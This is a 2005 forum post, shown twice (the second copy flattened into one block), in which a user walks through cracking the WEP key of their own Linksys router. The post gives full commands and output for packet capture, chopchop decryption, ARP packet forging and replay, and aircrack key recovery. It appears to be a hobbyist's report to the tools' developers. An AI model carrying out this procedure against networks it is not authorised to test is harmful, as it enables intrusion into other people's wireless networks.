NetStumbler.org Forums - View Single Post

tekn0 · 03-02-2005

I just had complete success.
Sorry again for the long post.

System: Slackware 10 2.4
Card: SMC 2532W-B Elite Connect PCMCIA

(Macs Have Been Changed To Protect The Innocent)
First i set the network state and put the card into monitor mode.
Then i started sniffing for my router and found it,
but im not running wpa (maybe a new linksys firmware trick).

root@tekn0:~# state.wlan wlan0 enable ; monitor.wlan wlan0 6
root@tekn0:~# airodump wlan0 linksys2

BSSID CH MB ENC PWR Packets LAN IP / # IVs ESSID

12:12:12:12:12:12 6 48 WPA -1 100 10 linksys

Then i started aireplay to get a usable data packet.
After a bunch of random packets i decided to try this one for some reason.

root@tekn0:~#./aireplay -i wlan0 -b 12:12:12:12:12:12
(ABOUT 10 PACKETS DOWN i think i pressed "n" about 10 times hehe)
Found one usable WEP data packet:

From DS = 1, To DS = 0
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0842 0000 ffff ffff ffff 0012 173f 9cf2 .B...........?..
0x0010: 0011 9518 3d42 d0c5 a785 0b00 a993 bbb0 ....=B..........
0x0020: bb03 1cde 2151 5b7a 54bc 4d03 b728 d7ab ....!Q[zT.M..(..
0x0030: 1553 cd37 56ee 0be4 f881 46e1 eb15 f75b .S.7V.....F....[
0x0040: 4f40 a83e a88a b7cf b00f 871c 78d0 e6f7 O@.>........x...
0x0050: d50a 8f9d d14d 3753 2528 b7bf 4dcc c226 .....M7S%(..M..&
0x0060: ccf4 53e8 da74 78f1 d158 15ff 0707 9fbe ..S..tx..X......
0x0070: db17 fa4a da42 8e8d 8157 7291 eaa9 7b5f ...J.B...Wr...{_
0x0080: bb4c 5fbd b681 4c09 .L_...L.

Replay this packet ? y
Saving replayed packet in replay-20050202_2102.cap

Next i ran chopchop with the new packet and crossed my fingers. :)

root@tekn0:~# ./chopchop-0.1/chopchop -i wlan0 -b 12:12:12:12:12:12 -m 34:34:34:34:34:34 -p replay-20050202_2102.cap
12:12:12:12:12:12 6
0
34:34:34:34:34:34 6
first pass
-----------------
packet number 001
base src mac: 12 12 12 12 12 12 <-----(THIS WAS DIFFRENT FROM WHAT I ENTERED ON THE COMMAND LINE BUT I CHANGED IT FOR THIS POST)
base dst mac: 34 34 34 34 34 34 <-----(THIS WAS ALSO DIFFRENT)
guess 0xaa / number of frame written 183
guess 0x06 / number of frame written 27
guess 0x85 / number of frame written 156
guess 0x77 / number of frame written 131
guess 0x65 / number of frame written 110
guess 0x01 / number of frame written 25
guess 0xa8 / number of frame written 197
guess 0xc0 / number of frame written 207
guess 0x00 / number of frame written 24
guess 0xe0 / number of frame written 496
guess 0x06 / number of frame written 28
guess 0x00 / number of frame written 27
guess 0xe0 / number of frame written 236
guess 0x93 / number of frame written 158
guess 0x04 / number of frame written 27
guess 0x00 / number of frame written 21
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 66
guess 0x00 / number of frame written 19
guess 0x0c / number of frame written 14
guess 0xc0 / number of frame written 222
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 40
guess 0x00 / number of frame written 14
guess 0x00 / number of frame written 23
guess 0x4f / number of frame written 86
guess 0x42 / number of frame written 80
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 80
guess 0x43 / number of frame written 93
guess 0x41 / number of frame written 93
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 92
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 71
guess 0x43 / number of frame written 76
guess 0x46 / number of frame written 79
guess 0x45 / number of frame written 92
guess 0x46 / number of frame written 79
guess 0x46 / number of frame written 72
guess 0x42 / number of frame written 86
guess 0x46 / number of frame written 92
guess 0x43 / number of frame written 75
guess 0x46 / number of frame written 78
guess 0x42 / number of frame written 77
guess 0x45 / number of frame written 79
guess 0x4e / number of frame written 105
guess 0x45 / number of frame written 79
guess 0x42 / number of frame written 352
guess 0x45 / number of frame written 73
guess 0x4d / number of frame written 92
guess 0x45 / number of frame written 88
guess 0x20 / number of frame written 53
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 26
guess 0x01 / number of frame written 22
guess 0x00 / number of frame written 27
guess 0x10 / number of frame written 27
guess 0x29 / number of frame written 53
guess 0x14 / number of frame written 27
guess 0x80 / number of frame written 156
guess 0xda / number of frame written 235
guess 0x6f / number of frame written 131
guess 0x4c / number of frame written 101
guess 0x00 / number of frame written 27
guess 0x89 / number of frame written 149
guess 0x00 / number of frame written 14
guess 0x89 / number of frame written 170
guess 0x00 / number of frame written 27
guess 0xff / number of frame written 261
guess 0x01 / number of frame written 27
guess 0xa8 / number of frame written 176
guess 0xc0 / number of frame written 222
guess 0x65 / number of frame written 123
guess 0x01 / number of frame written 21
guess 0xa8 / number of frame written 182
guess 0xc0 / number of frame written 222
guess 0x94 / number of frame written 157
guess 0xb5 / number of frame written 196
guess 0x11 / number of frame written 27
guess 0x80 / number of frame written 144
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 517
guess 0x44 / number of frame written 70
guess 0x00 / number of frame written 27
guess 0x60 / number of frame written 105
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x45 / number of frame written 79
OK

second pass
root@tekn0:~#

Awesome it worked :) And it only took like 1 min.
Notice There is not any instance of "frame written 13" (maybe thats the unlucky number?)
Then i used arpforge to create the forged packet.

root@tekn0:~# ./arpforge replay-20050202_2102.cap.iv.a7850b00 1 12:12:12:12:12:12 34:34:34:34:34:34 192.168.1.100 192.168.1.1 replay-test.cap
Done.

After that i replayed it.

root@tekn0:~# ./aireplay -r replay-test.cap wlan0

Found one usable WEP data packet:

From DS = 0, To DS = 1
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF

0x0000: 0841 0201 0012 173f 9cf2 0011 9518 3d42 .A.....?......=B
0x0010: ffff ffff ffff 8001 a785 0b00 a993 bbb0 ................
0x0020: bb03 1cd8 6450 531a 52fc 4d02 3728 f727 ....dPS.R.M.7(.'
0x0030: e8b9 0cfa 9722 0a1b f808 4668 2bf1 9980 ....."....Fh+...
0x0040: 20f6 ba9c ...

Replay this packet ? y
Saving replayed packet in replay-20050202_2107.cap
Open airodump in another console to capture replies.
Sent 300599 packets at 247 pkt/s

Then i captured in airodump for about 20 mins and after 240,000+ IV's aircrack cracked it :)

root@tekn0:~# aircrack -n 64 linksys2.cap
Opening pcap file linksys2.cap
Choosing first WEP-encrypted BSSID = 12:12:12:12:12:12

aircrack 2.1

* Got 248182! unique IVs | fudge factor = 2
* Elapsed time [00:00:01] | tried 4 keys at 240 k/m

KB depth votes
0 0/ 3 AB( 33) F0( 33) ED( 17) 65( 15) C9( 15) AC( 12)
1 0/ 3 CD( 28) 30( 16) 3E( 15) 70( 13) CE( 12) 36( 10)
2 0/ 1 EF( 60) 6A( 21) 6F( 12) 77( 12) 50( 7) 6B( 6)
3 1/ 7 12( 15) 29( 15) 31( 15) 52( 15) 13( 12) 25( 12)
4 0/ 3 34( 27) 58( 15) 5B( 15) 5C( 12) EA( 12) 5E( 11)

KEY FOUND! [ 123456789a ]

EOF.

I hope this helps and thanks again for such amazing work :)
Also i still have the magic packet i used in replay-20050202_2102.cap if needed.

03-02-2005	#10 (permalink)
tekn0 Registered Member Join Date: Jan 2005 Posts: 36	i just had complete success I just had complete success. Sorry again for the long post. System: Slackware 10 2.4 Card: SMC 2532W-B Elite Connect PCMCIA (Macs Have Been Changed To Protect The Innocent) First i set the network state and put the card into monitor mode. Then i started sniffing for my router and found it, but im not running wpa (maybe a new linksys firmware trick). root@tekn0:~# state.wlan wlan0 enable ; monitor.wlan wlan0 6 root@tekn0:~# airodump wlan0 linksys2 BSSID CH MB ENC PWR Packets LAN IP / # IVs ESSID 12:12:12:12:12:12 6 48 WPA -1 100 10 linksys Then i started aireplay to get a usable data packet. After a bunch of random packets i decided to try this one for some reason. root@tekn0:~#./aireplay -i wlan0 -b 12:12:12:12:12:12 (ABOUT 10 PACKETS DOWN i think i pressed "n" about 10 times hehe) Found one usable WEP data packet: From DS = 1, To DS = 0 BSSID = 12:12:12:12:12:12 Src. MAC = 34:34:34:34:34:34 Dst. MAC = FF:FF:FF:FF:FF:FF 0x0000: 0842 0000 ffff ffff ffff 0012 173f 9cf2 .B...........?.. 0x0010: 0011 9518 3d42 d0c5 a785 0b00 a993 bbb0 ....=B.......... 0x0020: bb03 1cde 2151 5b7a 54bc 4d03 b728 d7ab ....!Q[zT.M..(.. 0x0030: 1553 cd37 56ee 0be4 f881 46e1 eb15 f75b .S.7V.....F....[ 0x0040: 4f40 a83e a88a b7cf b00f 871c 78d0 e6f7 O@.>........x... 0x0050: d50a 8f9d d14d 3753 2528 b7bf 4dcc c226 .....M7S%(..M..& 0x0060: ccf4 53e8 da74 78f1 d158 15ff 0707 9fbe ..S..tx..X...... 0x0070: db17 fa4a da42 8e8d 8157 7291 eaa9 7b5f ...J.B...Wr...{_ 0x0080: bb4c 5fbd b681 4c09 .L_...L. Replay this packet ? y Saving replayed packet in replay-20050202_2102.cap Next i ran chopchop with the new packet and crossed my fingers. :) root@tekn0:~# ./chopchop-0.1/chopchop -i wlan0 -b 12:12:12:12:12:12 -m 34:34:34:34:34:34 -p replay-20050202_2102.cap 12:12:12:12:12:12 6 0 34:34:34:34:34:34 6 first pass ----------------- packet number 001 base src mac: 12 12 12 12 12 12 <-----(THIS WAS DIFFRENT FROM WHAT I ENTERED ON THE COMMAND LINE BUT I CHANGED IT FOR THIS POST) base dst mac: 34 34 34 34 34 34 <-----(THIS WAS ALSO DIFFRENT) guess 0xaa / number of frame written 183 guess 0x06 / number of frame written 27 guess 0x85 / number of frame written 156 guess 0x77 / number of frame written 131 guess 0x65 / number of frame written 110 guess 0x01 / number of frame written 25 guess 0xa8 / number of frame written 197 guess 0xc0 / number of frame written 207 guess 0x00 / number of frame written 24 guess 0xe0 / number of frame written 496 guess 0x06 / number of frame written 28 guess 0x00 / number of frame written 27 guess 0xe0 / number of frame written 236 guess 0x93 / number of frame written 158 guess 0x04 / number of frame written 27 guess 0x00 / number of frame written 21 guess 0x01 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x20 / number of frame written 66 guess 0x00 / number of frame written 19 guess 0x0c / number of frame written 14 guess 0xc0 / number of frame written 222 guess 0x01 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x20 / number of frame written 40 guess 0x00 / number of frame written 14 guess 0x00 / number of frame written 23 guess 0x4f / number of frame written 86 guess 0x42 / number of frame written 80 guess 0x41 / number of frame written 79 guess 0x43 / number of frame written 79 guess 0x41 / number of frame written 80 guess 0x43 / number of frame written 93 guess 0x41 / number of frame written 93 guess 0x43 / number of frame written 92 guess 0x41 / number of frame written 92 guess 0x43 / number of frame written 79 guess 0x41 / number of frame written 79 guess 0x43 / number of frame written 92 guess 0x41 / number of frame written 79 guess 0x43 / number of frame written 79 guess 0x41 / number of frame written 71 guess 0x43 / number of frame written 76 guess 0x46 / number of frame written 79 guess 0x45 / number of frame written 92 guess 0x46 / number of frame written 79 guess 0x46 / number of frame written 72 guess 0x42 / number of frame written 86 guess 0x46 / number of frame written 92 guess 0x43 / number of frame written 75 guess 0x46 / number of frame written 78 guess 0x42 / number of frame written 77 guess 0x45 / number of frame written 79 guess 0x4e / number of frame written 105 guess 0x45 / number of frame written 79 guess 0x42 / number of frame written 352 guess 0x45 / number of frame written 73 guess 0x4d / number of frame written 92 guess 0x45 / number of frame written 88 guess 0x20 / number of frame written 53 guess 0x01 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 26 guess 0x01 / number of frame written 22 guess 0x00 / number of frame written 27 guess 0x10 / number of frame written 27 guess 0x29 / number of frame written 53 guess 0x14 / number of frame written 27 guess 0x80 / number of frame written 156 guess 0xda / number of frame written 235 guess 0x6f / number of frame written 131 guess 0x4c / number of frame written 101 guess 0x00 / number of frame written 27 guess 0x89 / number of frame written 149 guess 0x00 / number of frame written 14 guess 0x89 / number of frame written 170 guess 0x00 / number of frame written 27 guess 0xff / number of frame written 261 guess 0x01 / number of frame written 27 guess 0xa8 / number of frame written 176 guess 0xc0 / number of frame written 222 guess 0x65 / number of frame written 123 guess 0x01 / number of frame written 21 guess 0xa8 / number of frame written 182 guess 0xc0 / number of frame written 222 guess 0x94 / number of frame written 157 guess 0xb5 / number of frame written 196 guess 0x11 / number of frame written 27 guess 0x80 / number of frame written 144 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 517 guess 0x44 / number of frame written 70 guess 0x00 / number of frame written 27 guess 0x60 / number of frame written 105 guess 0x00 / number of frame written 27 guess 0x00 / number of frame written 27 guess 0x45 / number of frame written 79 OK second pass root@tekn0:~# Awesome it worked :) And it only took like 1 min. Notice There is not any instance of "frame written 13" (maybe thats the unlucky number?) Then i used arpforge to create the forged packet. root@tekn0:~# ./arpforge replay-20050202_2102.cap.iv.a7850b00 1 12:12:12:12:12:12 34:34:34:34:34:34 192.168.1.100 192.168.1.1 replay-test.cap Done. After that i replayed it. root@tekn0:~# ./aireplay -r replay-test.cap wlan0 Found one usable WEP data packet: From DS = 0, To DS = 1 BSSID = 12:12:12:12:12:12 Src. MAC = 34:34:34:34:34:34 Dst. MAC = FF:FF:FF:FF:FF:FF 0x0000: 0841 0201 0012 173f 9cf2 0011 9518 3d42 .A.....?......=B 0x0010: ffff ffff ffff 8001 a785 0b00 a993 bbb0 ................ 0x0020: bb03 1cd8 6450 531a 52fc 4d02 3728 f727 ....dPS.R.M.7(.' 0x0030: e8b9 0cfa 9722 0a1b f808 4668 2bf1 9980 ....."....Fh+... 0x0040: 20f6 ba9c ... Replay this packet ? y Saving replayed packet in replay-20050202_2107.cap Open airodump in another console to capture replies. Sent 300599 packets at 247 pkt/s Then i captured in airodump for about 20 mins and after 240,000+ IV's aircrack cracked it :) root@tekn0:~# aircrack -n 64 linksys2.cap Opening pcap file linksys2.cap Choosing first WEP-encrypted BSSID = 12:12:12:12:12:12 aircrack 2.1 * Got 248182! unique IVs \| fudge factor = 2 * Elapsed time [00:00:01] \| tried 4 keys at 240 k/m KB depth votes 0 0/ 3 AB( 33) F0( 33) ED( 17) 65( 15) C9( 15) AC( 12) 1 0/ 3 CD( 28) 30( 16) 3E( 15) 70( 13) CE( 12) 36( 10) 2 0/ 1 EF( 60) 6A( 21) 6F( 12) 77( 12) 50( 7) 6B( 6) 3 1/ 7 12( 15) 29( 15) 31( 15) 52( 15) 13( 12) 25( 12) 4 0/ 3 34( 27) 58( 15) 5B( 15) 5C( 12) EA( 12) 5E( 11) KEY FOUND! [ 123456789a ] EOF. I hope this helps and thanks again for such amazing work :) Also i still have the magic packet i used in replay-20050202_2102.cap if needed. Last edited by tekn0 : 03-03-2005 at 01:52 AM.